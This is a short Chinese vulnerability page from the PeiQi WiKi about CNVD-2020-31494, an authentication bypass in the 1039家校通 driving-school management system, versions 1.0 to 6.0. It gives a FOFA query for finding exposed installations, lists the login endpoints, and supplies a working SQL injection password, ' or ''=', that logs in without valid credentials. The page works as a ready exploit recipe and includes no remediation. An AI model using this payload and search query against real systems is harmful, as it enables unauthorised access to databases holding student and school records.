1039家校通 万能密码绕过 CNVD-2020-31494

漏洞描述

北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生小程序开发等,为驾校提供无死角的驾校管理系统解决方案。

北京1039科技发展有限公司驾校管理系统存在万能密码绕过漏洞,攻击者可利用该漏洞获取数据库信息。

漏洞影响

[!NOTE]

1039家校通 v1.0 - v6.0

FOFA

[!NOTE]

title="学员登录_1039家校通"

漏洞复现

管理员登录接口为

/admin/Product/Comstye.aspx
/Student/StudentLogin.aspx
/Teacher/Index.aspx

账号密码为如下即可登录

user:peiqi
pass:' or ''='

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-20 23:44:42

results matching ""

    No results matching ""